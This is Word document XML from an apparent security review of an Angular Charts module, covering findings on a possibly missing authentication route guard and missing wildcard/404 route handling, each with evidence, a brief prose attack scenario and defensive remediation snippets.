        <w:t xml:space="preserve">route or any of its child routes. If no guard is configured, or if the guard is applied inconsistently (e.g., only to some child routes), unauthenticated users could access the charts module directly by navigating to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">without a valid session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 2 of the Charts screen documentation states: "Access control, if any, would be enforced at the Angular Router level via route guards (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CanActivate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guards such as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AuthGuard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) defined in the routing module that registers this component — those files are not included in the provided source." Section 14 states: "Security enforcement for the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">route (such as requiring an authenticated session) must be implemented via Angular route guards in the routing module. Developers should verify that an appropriate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CanActivate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guard is applied to this route in the routing configuration."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An unauthenticated external user navigates directly to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://[app-domain]/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CanActivate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guard is registered on the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parent route or the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">child route, Angular's router renders the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartjsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">without any authentication check. The attacker gains access to all data visualizations and any sensitive business data they represent without presenting credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Locate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">charts-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(or the relevant section of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and confirm that a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CanActivate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guard implementing authentication verification is applied to the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parent route definition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the guard at the parent route level (not just individual child routes) so that all current and future child routes under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inherit the protection automatically:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'charts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  component</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ChartsComponent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  canActivate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [AuthGuard]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  children</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify the fix by clearing session cookies and attempting to navigate directly to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— each should redirect to the login page, not render the component.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Not documented — WHO: the security lead or routing module owner; WHAT: Is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CanActivate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guard currently registered on the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parent route in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">charts-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">? If so, which guard class is used and what authentication check does it perform?; WHERE: Insert confirmed guard class name and authentication logic into the Description and Remediation sections of SEC-001]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Charts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Sections 2 and 14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-002: No Wildcard/404 Route Handling for Unmatched Child Routes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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A05 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-755: Improper Handling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7.4.1 — Verify that a generic message is shown when an unexpected or security-sensitive error occurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;router-outlet&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">unmatched route behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Application routing state; potential information disclosure via unhandled navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation notes that "the only edge case relevant at this level is an unmatched child route — Angular's router would handle this by rendering nothing in the outlet or redirecting to a wildcard/404 route if one is configured in the routing module." The routing module was not provided, so it cannot be confirmed whether a wildcard route (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">**</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is configured under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If no wildcard child route is defined, navigating to an invalid path such as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/nonexistent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">silently renders an empty outlet with no user feedback and no error logging. While this is not directly exploitable, it can mask routing misconfigurations and provides no observable signal when users or automated scanners probe for undocumented routes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 10 of the Charts screen documentation states: "the only edge case relevant at this level is an unmatched child route — Angular's router would handle this by rendering nothing in the outlet or redirecting to a wildcard/404 route if one is configured in the routing module."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An automated scanner probes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/api</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and similar paths. Without a wildcard route, each returns HTTP 200 with an empty outlet rather than HTTP 404, making it impossible to distinguish valid from invalid routes via status codes. This behavior can assist in application reconnaissance by confirming the existence of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">module without triggering error responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add a wildcard child route under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">charts-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that redirects to a defined 404 or "not found" page:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{ path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'**'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirectTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/404'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensure the application-level 404 page does not disclose internal route structure, component names, or framework version information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify by navigating to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/nonexistent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— the browser should redirect to the 404 page and the server should return an appropriate HTTP status code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Charts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-003: Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ChangeDetectionStrategy.OnPush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">— Defense-in-Depth Gap</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Severity</w:t>
